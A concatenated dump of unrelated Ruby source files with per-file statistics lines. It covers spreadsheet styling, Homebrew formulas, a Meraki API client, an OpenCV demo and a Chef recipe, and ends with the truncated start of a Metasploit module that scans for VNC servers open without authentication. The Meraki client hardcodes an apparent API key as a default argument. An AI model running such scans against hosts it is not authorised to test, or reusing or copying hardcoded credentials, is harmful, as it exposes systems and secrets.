options[:column_styles] = SpreadsheetArchitect::Utils.hash_array_symbolize_keys(options[:column_styles])
options[:column_styles].each do |x|
start_row = (options[:headers] ? options[:headers].count : 0) + 1
x[:styles] = SpreadsheetArchitect::Utils::XLSX.convert_styles_to_axlsx(x[:styles])
add_column_style = ->(col){
SpreadsheetArchitect::Utils::XLSX.verify_column(col, max_row_length)
range_str = SpreadsheetArchitect::Utils::XLSX.range_hash_to_str({rows: (start_row..num_rows), columns: col}, max_row_length, num_rows)
sheet.add_style range_str, x[:styles]
if x[:include_header] && start_row > 1
range_str = SpreadsheetArchitect::Utils::XLSX.range_hash_to_str({rows: (1..start_row-1), columns: col}, max_row_length, num_rows)
sheet.add_style(range_str, x[:styles])
end
}
case x[:columns]
when Array, Range
x[:columns].each do |col|
add_column_style.call(col)
end
when Integer, String
add_column_style.call(x[:columns])
else
SpreadsheetArchitect::Utils::XLSX.verify_column(x[:columns], max_row_length)
end
end
end
if options[:range_styles]
options[:range_styles] = SpreadsheetArchitect::Utils.hash_array_symbolize_keys(options[:range_styles])
options[:range_styles].each do |x|
styles = SpreadsheetArchitect::Utils::XLSX.convert_styles_to_axlsx(x[:styles])
if x[:range].is_a?(Hash)
x[:range] = SpreadsheetArchitect::Utils::XLSX.range_hash_to_str(x[:range], max_row_length, num_rows)
else
SpreadsheetArchitect::Utils::XLSX.verify_range(x[:range], num_rows)
end
sheet.add_style x[:range], styles
end
end
if options[:merges]
options[:merges] = SpreadsheetArchitect::Utils.hash_array_symbolize_keys(options[:merges])
options[:merges].each do |x|
if x[:range].is_a?(Hash)
x[:range] = SpreadsheetArchitect::Utils::XLSX.range_hash_to_str(x[:range], max_row_length, num_rows)
else
SpreadsheetArchitect::Utils::XLSX.verify_range(x[:range], num_rows)
end
sheet.merge_cells x[:range]
end
end
if options[:freeze_headers]
sheet.sheet_view.pane do |pane|
pane.state = :frozen
pane.y_split = options[:headers].count
end
elsif options[:freeze]
options[:freeze] = SpreadsheetArchitect::Utils.symbolize_keys(options[:freeze])
sheet.sheet_view.pane do |pane|
pane.state = :frozen
### Currently not working
#if options[:freeze][:active_pane]
# Axlsx.validate_pane_type(options[:freeze][:active_pane])
# pane.active_pane = options[:freeze][:active_pane]
#else
# pane.active_pane = :bottom_right
#end
if !options[:freeze][:rows]
raise SpreadsheetArchitect::Exceptions::ArgumentError.new("The :rows key must be specified in the :freeze option hash")
elsif options[:freeze][:rows].is_a?(Range)
pane.y_split = options[:freeze][:rows].count
else
pane.y_split = 1
end
if options[:freeze][:columns] && options[:freeze][:columns] != :all
if options[:freeze][:columns].is_a?(Range)
pane.x_split = options[:freeze][:columns].count
else
pane.x_split = 1
end
end
end
end
end
return package
end
end
end
| 37.218254 | 168 | 0.603263 |
286dc7022bd38e6db21d163117723c0d5027dc11 | 167 | # http://www.codewars.com/kata/56445cc2e5747d513c000033
# --- iteration 1 ---
def validate(msg)
/\AMDZHB \d{2} \d{3} [A-Z]+ \d{2} \d{2} \d{2} \d{2}\z/ === msg
end
| 23.857143 | 65 | 0.580838 |
ffb1ca7cbf8fe74aa02f7312545c7733fa314764 | 455 | # frozen_string_literal: true
class FeaturedCircuit < ApplicationRecord
belongs_to :project
after_create :featured_circuit_email
validate :project_public
private
def project_public
if project.project_access_type != "Public"
errors.add(:project, "Featured projects have to be public")
end
end
def featured_circuit_email
UserMailer.featured_circuit_email(project.author, project).deliver_later
end
end
| 21.666667 | 78 | 0.749451 |
bbfe784d467961a47de671d9be65291f235a017d | 2,151 | require 'date'
# RequestLogAnalyzer is the base namespace in which all functionality of RequestLogAnalyzer is implemented.
# This module itself contains some functions to help with class and source file loading. The actual
# application startup code resides in the {RequestLogAnalyzer::Controller} class.
#
# The {RequestLogAnalyzer::VERSION} constant can be used to determine what version of request-log-analyzer
# is running.
module RequestLogAnalyzer
# Convert a string/symbol in camel case ({RequestLogAnalyzer::Controller}) to underscores
# (<tt>request_log_analyzer/controller</tt>). This function can be used to load the file (using
# <tt>require</tt>) in which the given constant is defined.
#
# @param [#to_s] str The string-like to convert in the following format: <tt>ModuleName::ClassName</tt>.
# @return [String] The input string converted to underscore form.
def self.to_underscore(str)
str.to_s.gsub(/::/, '/').gsub(/([A-Z]+)([A-Z][a-z])/, '\1_\2').gsub(/([a-z\d])([A-Z])/, '\1_\2').tr('-', '_').downcase
end
# Convert a string/symbol in underscores (<tt>request_log_analyzer/controller</tt>) to camelcase
# ({RequestLogAnalyzer::Controller}). This can be used to find the class that is defined in a given
# filename.
#
# @param [#to_s] str The string-like to convert in the f`ollowing format: <tt>module_name/class_name</tt>.
# @return [String] The input string converted to camelcase form.
def self.to_camelcase(str)
str.to_s.gsub(/\/(.?)/) { '::' + Regexp.last_match[1].upcase }.gsub(/(^|_)(.)/) { Regexp.last_match[2].upcase }
end
end
require 'request_log_analyzer/version'
require 'request_log_analyzer/controller'
require 'request_log_analyzer/aggregator'
require 'request_log_analyzer/class_level_inheritable_attributes'
require 'request_log_analyzer/file_format'
require 'request_log_analyzer/filter'
require 'request_log_analyzer/line_definition'
require 'request_log_analyzer/log_processor'
require 'request_log_analyzer/mailer'
require 'request_log_analyzer/output'
require 'request_log_analyzer/request'
require 'request_log_analyzer/source'
require 'request_log_analyzer/tracker'
| 48.886364 | 122 | 0.757787 |
7a103ce44064fbcd4ca2d37d2e255c9e28680434 | 41 | include_recipe 'delivery-truck::default'
| 20.5 | 40 | 0.829268 |
e86d94b1ec6b3760d6ee9569c76973860711efb5 | 943 | module Trample
class Page
attr_reader :request_method, :think_time
def initialize(request_method, url, think_time, parameters = {})
@request_method = request_method
@url = url
@think_time = think_time
@parameters = parameters
end
def parameters
proc_params? ? @parameters.call : @parameters
end
def ==(other)
other.is_a?(Page) &&
other.request_method == request_method &&
other.url == url &&
other.think_time == think_time
end
def url
proc_params? ? interpolated_url : @url
end
protected
def proc_params?
@parameters.is_a?(Proc)
end
def interpolated_url
params = parameters # cache called proc
url = @url.dup
url.scan(/\:[A-Za-z_]\w+/).each do |m|
url.gsub!(m, params[m.gsub(/:/, '').to_sym].to_s)
end
url
end
end
end
| 22.452381 | 68 | 0.566278 |
b9bdd415066d8d56f62f84deb7aafb9cfc521942 | 2,024 | require 'helper'
require 'faraday_middleware/response/parse_xml'
describe FaradayMiddleware::ParseXml, :type => :response do
let(:xml) { '<user><name>Erik Michaels-Ober</name><screen_name>sferik</screen_name></user>' }
let(:user) { {'user' => {'name' => 'Erik Michaels-Ober', 'screen_name' => 'sferik'} } }
context "no type matching" do
it "doesn't change nil body" do
expect(process(nil).body).to be_nil
end
it "turns empty body into empty hash" do
expect(process('').body).to be_eql({})
end
it "parses xml body" do
response = process(xml)
expect(response.body).to eq(user)
expect(response.env[:raw_body]).to be_nil
end
end
context "with preserving raw" do
let(:options) { {:preserve_raw => true} }
it "parses xml body" do
response = process(xml)
expect(response.body).to eq(user)
expect(response.env[:raw_body]).to eq(xml)
end
it "can opt out of preserving raw" do
response = process(xml, nil, :preserve_raw => false)
expect(response.env[:raw_body]).to be_nil
end
end
context "with regexp type matching" do
let(:options) { {:content_type => /\bxml$/} }
it "parses xml body of correct type" do
response = process(xml, 'application/xml')
expect(response.body).to eq(user)
end
it "ignores xml body of incorrect type" do
response = process(xml, 'text/html')
expect(response.body).to eq(xml)
end
end
context "with array type matching" do
let(:options) { {:content_type => %w[a/b c/d]} }
it "parses xml body of correct type" do
expect(process(xml, 'a/b').body).to be_a(Hash)
expect(process(xml, 'c/d').body).to be_a(Hash)
end
it "ignores xml body of incorrect type" do
expect(process(xml, 'a/d').body).not_to be_a(Hash)
end
end
it "chokes on invalid xml" do
['{!', '"a"', 'true', 'null', '1'].each do |data|
expect{ process(data) }.to raise_error(Faraday::Error::ParsingError)
end
end
end
| 28.111111 | 96 | 0.630929 |
28eaccbe484d9e5e6e37cb1742660e2f3500a22f | 118 | RSpec.configure do |config|
config.before(:each) do
ApplicationController.current_user = User.create!
end
end
| 19.666667 | 53 | 0.754237 |
f86bfc6f8f25ccb72766b424894ad6470478f34c | 1,141 | class Wv2 < Formula
desc "Programs for accessing Microsoft Word documents"
homepage "https://wvware.sourceforge.io/"
url "https://downloads.sourceforge.net/project/wvware/wv2-0.4.2.tar.bz2"
sha256 "9f2b6d3910cb0e29c9ff432f935a594ceec0101bca46ba2fc251aff251ee38dc"
bottle do
cellar :any
sha256 "7bda8de476777410ab350ceca0e089e20169f17a3d9cb31d313653c906766a85" => :mojave
sha256 "35120de253c5dcfd6da711f7529bd8e4a0ffd45eed540057ef57d1a9d2ab0091" => :high_sierra
sha256 "cd0856f53f0a143f5b0ea7dd61a0d23613db6de84538fa222e2819217a3ed3af" => :sierra
sha256 "b3a07e873f69b90ed83d47ccedb6bc5fefcb5dc5c9ffd1ecfd38c03dd094afea" => :el_capitan
sha256 "51ea82d6630ceee1739d0f252462ef8c4394ffaf0fb81b0a5141990f865f1427" => :yosemite
sha256 "e91c85bf622d483194ab85c78c7b8131de245f54f64ee61a961c0b24d31545cc" => :mavericks
end
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "glib"
depends_on "libgsf"
def install
ENV.append "LDFLAGS", "-liconv -lgobject-2.0" # work around broken detection
system "cmake", ".", *std_cmake_args
system "make", "install"
end
end
| 40.75 | 93 | 0.787029 |
7aae344236b1cddd321f02b4aa8b6f85fcc053d6 | 11,399 | # meraki
#
# This file was automatically generated by APIMATIC v2.0
# ( https://apimatic.io ).
module Meraki
# meraki client class.
class MerakiClient
# Singleton access to organizations controller.
# @return [OrganizationsController] Returns the controller instance.
def organizations
OrganizationsController.instance
end
# Singleton access to mx_1_many_nat_rules controller.
# @return [MX1ManyNATRulesController] Returns the controller instance.
def mx_1_many_nat_rules
MX1ManyNATRulesController.instance
end
# Singleton access to firewalled_services controller.
# @return [FirewalledServicesController] Returns the controller instance.
def firewalled_services
FirewalledServicesController.instance
end
# Singleton access to traffic_shaping controller.
# @return [TrafficShapingController] Returns the controller instance.
def traffic_shaping
TrafficShapingController.instance
end
# Singleton access to wireless_health controller.
# @return [WirelessHealthController] Returns the controller instance.
def wireless_health
WirelessHealthController.instance
end
# Singleton access to alert_settings controller.
# @return [AlertSettingsController] Returns the controller instance.
def alert_settings
AlertSettingsController.instance
end
# Singleton access to admins controller.
# @return [AdminsController] Returns the controller instance.
def admins
AdminsController.instance
end
# Singleton access to action_batches controller.
# @return [ActionBatchesController] Returns the controller instance.
def action_batches
ActionBatchesController.instance
end
# Singleton access to switch_ports controller.
# @return [SwitchPortsController] Returns the controller instance.
def switch_ports
SwitchPortsController.instance
end
# Singleton access to ssids controller.
# @return [SsidsController] Returns the controller instance.
def ssids
SsidsController.instance
end
# Singleton access to splash_settings controller.
# @return [SplashSettingsController] Returns the controller instance.
def splash_settings
SplashSettingsController.instance
end
# Singleton access to splash_login_attempts controller.
# @return [SplashLoginAttemptsController] Returns the controller instance.
def splash_login_attempts
SplashLoginAttemptsController.instance
end
# Singleton access to sm controller.
# @return [SMController] Returns the controller instance.
def sm
SMController.instance
end
# Singleton access to named_tag_scope controller.
# @return [NamedTagScopeController] Returns the controller instance.
def named_tag_scope
NamedTagScopeController.instance
end
# Singleton access to saml_roles controller.
# @return [SAMLRolesController] Returns the controller instance.
def saml_roles
SAMLRolesController.instance
end
# Singleton access to pii controller.
# @return [PIIController] Returns the controller instance.
def pii
PIIController.instance
end
# Singleton access to open_api_spec controller.
# @return [OpenAPISpecController] Returns the controller instance.
def open_api_spec
OpenAPISpecController.instance
end
# Singleton access to management_interface_settings controller.
# @return [ManagementInterfaceSettingsController] Returns the controller instance.
def management_interface_settings
ManagementInterfaceSettingsController.instance
end
# Singleton access to mr_l3_firewall controller.
# @return [MRL3FirewallController] Returns the controller instance.
def mr_l3_firewall
MRL3FirewallController.instance
end
# Singleton access to mx_l7_firewall controller.
# @return [MXL7FirewallController] Returns the controller instance.
def mx_l7_firewall
MXL7FirewallController.instance
end
# Singleton access to group_policies controller.
# @return [GroupPoliciesController] Returns the controller instance.
def group_policies
GroupPoliciesController.instance
end
# Singleton access to networks controller.
# @return [NetworksController] Returns the controller instance.
def networks
NetworksController.instance
end
# Singleton access to mv_sense controller.
# @return [MVSenseController] Returns the controller instance.
def mv_sense
MVSenseController.instance
end
# Singleton access to vlans controller.
# @return [VlansController] Returns the controller instance.
def vlans
VlansController.instance
end
# Singleton access to uplink_settings controller.
# @return [UplinkSettingsController] Returns the controller instance.
def uplink_settings
UplinkSettingsController.instance
end
# Singleton access to static_routes controller.
# @return [StaticRoutesController] Returns the controller instance.
def static_routes
StaticRoutesController.instance
end
# Singleton access to mx_port_forwarding_rules controller.
# @return [MXPortForwardingRulesController] Returns the controller instance.
def mx_port_forwarding_rules
MXPortForwardingRulesController.instance
end
# Singleton access to mx_1_1_nat_rules controller.
# @return [MX11NATRulesController] Returns the controller instance.
def mx_1_1_nat_rules
MX11NATRulesController.instance
end
# Singleton access to content_filtering_rules controller.
# @return [ContentFilteringRulesController] Returns the controller instance.
def content_filtering_rules
ContentFilteringRulesController.instance
end
# Singleton access to content_filtering_categories controller.
# @return [ContentFilteringCategoriesController] Returns the controller instance.
def content_filtering_categories
ContentFilteringCategoriesController.instance
end
# Singleton access to syslog_servers controller.
# @return [SyslogServersController] Returns the controller instance.
def syslog_servers
SyslogServersController.instance
end
# Singleton access to switch_stacks controller.
# @return [SwitchStacksController] Returns the controller instance.
def switch_stacks
SwitchStacksController.instance
end
# Singleton access to switch_profiles controller.
# @return [SwitchProfilesController] Returns the controller instance.
def switch_profiles
SwitchProfilesController.instance
end
# Singleton access to switch_settings controller.
# @return [SwitchSettingsController] Returns the controller instance.
def switch_settings
SwitchSettingsController.instance
end
# Singleton access to snmp_settings controller.
# @return [SNMPSettingsController] Returns the controller instance.
def snmp_settings
SNMPSettingsController.instance
end
# Singleton access to malware_settings controller.
# @return [MalwareSettingsController] Returns the controller instance.
def malware_settings
MalwareSettingsController.instance
end
# Singleton access to intrusion_settings controller.
# @return [IntrusionSettingsController] Returns the controller instance.
def intrusion_settings
IntrusionSettingsController.instance
end
# Singleton access to radio_settings controller.
# @return [RadioSettingsController] Returns the controller instance.
def radio_settings
RadioSettingsController.instance
end
# Singleton access to clients controller.
# @return [ClientsController] Returns the controller instance.
def clients
ClientsController.instance
end
# Singleton access to api_usage controller.
# @return [APIUsageController] Returns the controller instance.
def api_usage
APIUsageController.instance
end
# Singleton access to net_flow_settings controller.
# @return [NetFlowSettingsController] Returns the controller instance.
def net_flow_settings
NetFlowSettingsController.instance
end
# Singleton access to meraki_auth_users controller.
# @return [MerakiAuthUsersController] Returns the controller instance.
def meraki_auth_users
MerakiAuthUsersController.instance
end
# Singleton access to http_servers controller.
# @return [HTTPServersController] Returns the controller instance.
def http_servers
HTTPServersController.instance
end
# Singleton access to mx_vpn_firewall controller.
# @return [MXVPNFirewallController] Returns the controller instance.
def mx_vpn_firewall
MXVPNFirewallController.instance
end
# Singleton access to mx_l7_application_categories controller.
# @return [MXL7ApplicationCategoriesController] Returns the controller instance.
def mx_l7_application_categories
MXL7ApplicationCategoriesController.instance
end
# Singleton access to mx_l3_firewall controller.
# @return [MXL3FirewallController] Returns the controller instance.
def mx_l3_firewall
MXL3FirewallController.instance
end
# Singleton access to mx_cellular_firewall controller.
# @return [MXCellularFirewallController] Returns the controller instance.
def mx_cellular_firewall
MXCellularFirewallController.instance
end
# Singleton access to devices controller.
# @return [DevicesController] Returns the controller instance.
def devices
DevicesController.instance
end
# Singleton access to config_templates controller.
# @return [ConfigTemplatesController] Returns the controller instance.
def config_templates
ConfigTemplatesController.instance
end
# Singleton access to cameras controller.
# @return [CamerasController] Returns the controller instance.
def cameras
CamerasController.instance
end
# Singleton access to bluetooth_clients controller.
# @return [BluetoothClientsController] Returns the controller instance.
def bluetooth_clients
BluetoothClientsController.instance
end
# Singleton access to security_events controller.
# @return [SecurityEventsController] Returns the controller instance.
def security_events
SecurityEventsController.instance
end
# Singleton access to webhook_logs controller.
# @return [WebhookLogsController] Returns the controller instance.
def webhook_logs
WebhookLogsController.instance
end
# Returns the configuration class for easy access.
# @return [Configuration] Returns the actual configuration class.
def config
Configuration
end
# Initializer with authentication and configuration parameters.
def initialize(x_cisco_meraki_api_key: '15da0c6ffff295f16267f88f98694cf29a86ed87')
Configuration.x_cisco_meraki_api_key = x_cisco_meraki_api_key if
x_cisco_meraki_api_key
end
end
end
| 33.526471 | 87 | 0.734012 |
bfd4de6618eefc5bb8d3a86c6eab81c4c8629c58 | 2,888 | class Mandoc < Formula
desc "The mandoc UNIX manpage compiler toolset"
homepage "https://mandoc.bsd.lv/"
url "https://mandoc.bsd.lv/snapshots/mandoc-1.14.3.tar.gz"
sha256 "0b0c8f67958c1569ead4b690680c337984b879dfd2ad4648d96924332fd99528"
head "[email protected]:/cvs", :using => :cvs
bottle do
sha256 "c16d34b3c6c0e22ede164139f6fdb0268a440e39ca94ce791d5f580b4c2c01f1" => :high_sierra
sha256 "59709d56bff5dedfe3f544b4da3d6791f32dbf4e4299a242719b39a21dc0c050" => :sierra
sha256 "2e23fd7255dc440233289f138edc9dada06eab91ff3570329fa5ebce425f5714" => :el_capitan
sha256 "dd4131a36901d8650f896c90bd6e9cc08bfe6d146db5c7461e63e0e6e2b3d49a" => :yosemite
end
option "without-cgi", "Don't build man.cgi (and extra CSS files)."
def install
localconfig = [
# Sane prefixes.
"PREFIX=#{prefix}",
"INCLUDEDIR=#{include}",
"LIBDIR=#{lib}",
"MANDIR=#{man}",
"WWWPREFIX=#{prefix}/var/www",
"EXAMPLEDIR=#{share}/examples",
# Executable names, where utilities would be replaced/duplicated.
# The mandoc versions of the utilities are definitely *not* ready
# for prime-time on Darwin, though some changes in HEAD are promising.
# The "bsd" prefix (like bsdtar, bsdmake) is more informative than "m".
"BINM_MAN=bsdman",
"BINM_APROPOS=bsdapropos",
"BINM_WHATIS=bsdwhatis",
"BINM_MAKEWHATIS=bsdmakewhatis", # default is "makewhatis".
# These are names for *section 7* pages only. Several other pages are
# prefixed "mandoc_", similar to the "groff_" pages.
"MANM_MAN=man",
"MANM_MDOC=mdoc",
"MANM_ROFF=mandoc_roff", # This is the only one that conflicts (groff).
"MANM_EQN=eqn",
"MANM_TBL=tbl",
"OSNAME='Mac OS X #{MacOS.version}'", # Bottom corner signature line.
# Not quite sure what to do here. The default ("/usr/share", etc.) needs
# sudoer privileges, or will error. So just brew's manpages for now?
"MANPATH_DEFAULT=#{HOMEBREW_PREFIX}/share/man",
"HAVE_MANPATH=0", # Our `manpath` is a symlink to system `man`.
"STATIC=", # No static linking on Darwin.
"HOMEBREWDIR=#{HOMEBREW_CELLAR}" # ? See configure.local.example, NEWS.
]
localconfig << "BUILD_CGI=1" if build.with? "cgi"
File.rename("cgi.h.example", "cgi.h") # For man.cgi, harmless in any case.
(buildpath/"configure.local").write localconfig.join("\n")
system "./configure"
# I've tried twice to send a bug report on this to [email protected].
# In theory, it should show up with:
# search.gmane.org/?query=jobserver&group=gmane.comp.tools.mdocml.devel
ENV.deparallelize do
system "make"
system "make", "install"
end
end
test do
system "#{bin}/mandoc", "-Thtml",
"-Ostyle=#{share}/examples/example.style.css", "#{man1}/mandoc.1"
end
end
| 37.506494 | 93 | 0.676939 |
288fd0a8d9d18991330495a6c83361576fca8a34 | 5,194 | #!/usr/bin/env ruby
# -*- mode: ruby; coding: utf-8 -*-
# A Demo Ruby/OpenCV Implementation of SURF
# See https://code.ros.org/trac/opencv/browser/tags/2.3.1/opencv/samples/c/find_obj.cpp
require 'opencv'
require 'benchmark'
include OpenCV
def compare_surf_descriptors(d1, d2, best, length)
raise ArgumentError unless (length % 4) == 0
total_cost = 0
0.step(length - 1, 4) { |i|
t0 = d1[i] - d2[i]
t1 = d1[i + 1] - d2[i + 1]
t2 = d1[i + 2] - d2[i + 2]
t3 = d1[i + 3] - d2[i + 3]
total_cost += t0 * t0 + t1 * t1 + t2 * t2 + t3 * t3
break if total_cost > best
}
total_cost
end
def naive_nearest_neighbor(vec, laplacian, model_keypoints, model_descriptors)
length = model_descriptors[0].size
neighbor = nil
dist1 = 1e6
dist2 = 1e6
model_descriptors.size.times { |i|
kp = model_keypoints[i]
mvec = model_descriptors[i]
next if laplacian != kp.laplacian
d = compare_surf_descriptors(vec, mvec, dist2, length)
if d < dist1
dist2 = dist1
dist1 = d
neighbor = i
elsif d < dist2
dist2 = d
end
}
return (dist1 < 0.6 * dist2) ? neighbor : nil
end
def find_pairs(object_keypoints, object_descriptors,
image_keypoints, image_descriptors)
ptpairs = []
object_descriptors.size.times { |i|
kp = object_keypoints[i]
descriptor = object_descriptors[i]
nearest_neighbor = naive_nearest_neighbor(descriptor, kp.laplacian, image_keypoints, image_descriptors)
unless nearest_neighbor.nil?
ptpairs << i
ptpairs << nearest_neighbor
end
}
ptpairs
end
def locate_planar_object(object_keypoints, object_descriptors,
image_keypoints, image_descriptors, src_corners)
ptpairs = find_pairs(object_keypoints, object_descriptors, image_keypoints, image_descriptors)
n = ptpairs.size / 2
return nil if n < 4
pt1 = []
pt2 = []
n.times { |i|
pt1 << object_keypoints[ptpairs[i * 2]].pt
pt2 << image_keypoints[ptpairs[i * 2 + 1]].pt
}
_pt1 = CvMat.new(1, n, CV_32F, 2)
_pt2 = CvMat.new(1, n, CV_32F, 2)
_pt1.set_data(pt1)
_pt2.set_data(pt2)
h = CvMat.find_homography(_pt1, _pt2, :ransac, 5)
dst_corners = []
4.times { |i|
x = src_corners[i].x
y = src_corners[i].y
z = 1.0 / (h[6][0] * x + h[7][0] * y + h[8][0])
x = (h[0][0] * x + h[1][0] * y + h[2][0]) * z
y = (h[3][0] * x + h[4][0] * y + h[5][0]) * z
dst_corners << CvPoint.new(x.to_i, y.to_i)
}
dst_corners
end
##### Main #####
puts 'This program demonstrated the use of the SURF Detector and Descriptor using'
puts 'brute force matching on planar objects.'
puts 'Usage:'
puts "ruby #{__FILE__} <object_filename> <scene_filename>, default is box.png and box_in_scene.png"
puts
object_filename = (ARGV.size == 2) ? ARGV[0] : 'images/box.png'
scene_filename = (ARGV.size == 2) ? ARGV[1] : 'images/box_in_scene.png'
object, image = nil, nil
begin
object = IplImage.load(object_filename, CV_LOAD_IMAGE_GRAYSCALE)
image = IplImage.load(scene_filename, CV_LOAD_IMAGE_GRAYSCALE)
rescue
puts "Can not load #{object_filename} and/or #{scene_filename}"
puts "Usage: ruby #{__FILE__} [<object_filename> <scene_filename>]"
exit
end
object_color = object.GRAY2BGR
param = CvSURFParams.new(1500)
object_keypoints, object_descriptors = nil, nil
image_keypoints, image_descriptors = nil, nil
tms = Benchmark.measure {
object_keypoints, object_descriptors = object.extract_surf(param)
puts "Object Descriptors: #{object_descriptors.size}"
image_keypoints, image_descriptors = image.extract_surf(param)
puts "Image Descriptors: #{image_descriptors.size}"
}
puts "Extraction time = #{tms.real * 1000} ms"
correspond = IplImage.new(image.width, object.height + image.height, CV_8U, 1);
correspond.set_roi(CvRect.new(0, 0, object.width, object.height))
object.copy(correspond)
correspond.set_roi(CvRect.new(0, object.height, image.width, image.height))
image.copy(correspond)
correspond.reset_roi
src_corners = [CvPoint.new(0, 0), CvPoint.new(object.width, 0),
CvPoint.new(object.width, object.height), CvPoint.new(0, object.height)]
dst_corners = locate_planar_object(object_keypoints, object_descriptors,
image_keypoints, image_descriptors, src_corners)
correspond = correspond.GRAY2BGR
if dst_corners
4.times { |i|
r1 = dst_corners[i % 4]
r2 = dst_corners[(i + 1) % 4]
correspond.line!(CvPoint.new(r1.x, r1.y + object.height), CvPoint.new(r2.x, r2.y + object.height),
color: CvColor::Red, thickness: 2, line_type: :aa)
}
end
ptpairs = find_pairs(object_keypoints, object_descriptors, image_keypoints, image_descriptors)
0.step(ptpairs.size - 1, 2) { |i|
r1 = object_keypoints[ptpairs[i]]
r2 = image_keypoints[ptpairs[i + 1]]
correspond.line!(r1.pt, CvPoint.new(r2.pt.x, r2.pt.y + object.height),
color: CvColor::Red, line_type: :aa)
}
object_keypoints.each { |r|
radius = (r.size * 1.2 / 9.0 * 2).to_i
object_color.circle!(r.pt, radius, color: CvColor::Red, line_type: :aa)
}
GUI::Window.new('Object Correspond').show correspond
GUI::Window.new('Object').show object_color
GUI::wait_key
| 30.552941 | 107 | 0.67424 |
030e71e18d09494c92c7874cb2dcb980092cf667 | 1,122 | =begin
This file is a cotribution to Viewpoint; the Ruby library for Microsoft Exchange Web Services.
Copyright © 2013 Mark McCahill <[email protected]>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=end
module Viewpoint::EWS::CalendarAccessors
include Viewpoint::EWS
def event_busy_type( the_event )
the_event[:calendar_event][:elems][2][:busy_type][:text]
end
def event_start_time( the_event )
the_event[:calendar_event][:elems][0][:start_time][:text]
end
def event_end_time( the_event )
the_event[:calendar_event][:elems][1][:end_time][:text]
end
end # Viewpoint::EWS::CalendarAccessors
| 32.057143 | 94 | 0.755793 |
b9d604f5fd072dcfbb238d1afe30fa07ea3e3783 | 66 | # frozen_string_literal: true
json.(user, :id, :username, :name)
| 16.5 | 34 | 0.712121 |
d57d9fc3eb6efb691b0c541fed166c20325a2b20 | 1,210 | class B3sum < Formula
desc "The BLAKE3 cryptographic hash function"
homepage "https://github.com/BLAKE3-team/BLAKE3"
url "https://github.com/BLAKE3-team/BLAKE3/archive/0.3.1.tar.gz"
sha256 "200587a49098957b5c119936ebee248cae4fb437827e444c7708e92ddf55836c"
bottle do
cellar :any_skip_relocation
sha256 "242cb591b1c1508de78f07837eacfc3cfc998380475a96e2e55e0038ea0fa169" => :catalina
sha256 "68f37fc80b6eaa9621f944548f76c43942d4bde6b54489e1b0c7577261d9b3fc" => :mojave
sha256 "1bd0a9cddba682167b84e8ea52eaf1a5f3303ca477fd0bbcae75ade764a1acba" => :high_sierra
end
depends_on "llvm" => :build if DevelopmentTools.clang_build_version <= 1000
depends_on "rust" => :build
def install
if DevelopmentTools.clang_build_version <= 1000
ENV["HOMEBREW_CC"] = "llvm_clang"
ENV.remove "HOMEBREW_LIBRARY_PATHS", Formula["llvm"].opt_lib
end
system "cargo", "install", "--locked", "--root", prefix, "--path", "./b3sum/"
end
test do
(testpath/"test.txt").write <<~EOS
content
EOS
output = shell_output("#{bin}/b3sum test.txt")
assert_equal "df0c40684c6bda3958244ee330300fdcbc5a37fb7ae06fe886b786bc474be87e test.txt", output.strip
end
end
| 35.588235 | 107 | 0.74876 |
1a32b770322535cc460ca8e5263322db9a34fe8f | 1,383 | #
# Cookbook Name:: mysql
# Recipe:: client
#
# Copyright 2008-2011, Opscode, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
::Chef::Resource::Package.send(:include, Opscode::Mysql::Helpers)
mysql_packages = case node['platform']
when "centos", "redhat", "suse", "fedora", "scientific", "amazon"
%w{mysql mysql-devel}
when "ubuntu","debian"
if debian_before_squeeze? || ubuntu_before_lucid?
%w{mysql-client libmysqlclient15-dev}
else
%w{mysql-client libmysqlclient-dev}
end
when "freebsd"
%w{mysql55-client}
else
%w{mysql-client libmysqlclient-dev}
end
mysql_packages.each do |mysql_pack|
package mysql_pack do
action :install
end
end
if platform?(%w{ redhat centos fedora suse scientific amazon })
package 'ruby-mysql'
elsif platform?(%w{ debian ubuntu })
package "libmysql-ruby"
else
gem_package "mysql" do
action :install
end
end
| 26.596154 | 74 | 0.733189 |
62ae92efc396dea24f08919234f9e53d05d37ea4 | 685 | require 'redcarpet'
module ExtraExtra
class SemanticHtmlRenderer < Redcarpet::Render::HTML
def initialize(opts={})
@header_level_offset = opts.delete(:header_level_offset) || 1
@header_class_prefix = opts.delete(:header_class_prefix) || "h"
@header_class_prefix_offset = opts.delete(:header_class_prefix_offset) || (@header_level_offset + 1)
super(opts)
end
def header(text, header_level,anchor=nil)
anchor ||= text.parameterize
"<a name='#{anchor}'></a><h#{header_level+@header_level_offset} class='#{@header_class_prefix}#{header_level+@header_class_prefix_offset}'>#{text}</h#{header_level+@header_level_offset}>"
end
end
end
| 42.8125 | 193 | 0.718248 |
33b260cd4ded90eb72cab72b4ce56d9768d97a7f | 2,494 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/proto/rfb'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'VNC Authentication None Detection',
'Description' => 'Detect VNC servers that support the "None" authentication method.',
'References' =>
[
['URL', 'http://en.wikipedia.org/wiki/RFB'],
['URL', 'http://en.wikipedia.org/wiki/Vnc'],
],
'Author' =>
[
'Matteo Cantoni <goony[at]nothink.org>',
'jduck'
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(5900)
], self.class)
end
def run_host(target_host)
connect
begin
vnc = Rex::Proto::RFB::Client.new(sock)
if not vnc.handshake
raise RuntimeError.new("Handshake failed: #{vnc.error}")
end
ver = "#{vnc.majver}.#{vnc.minver}"
print_status("#{target_host}:#{rport}, VNC server protocol version : #{ver}")
svc = report_service(
:host => rhost,
:port => rport,
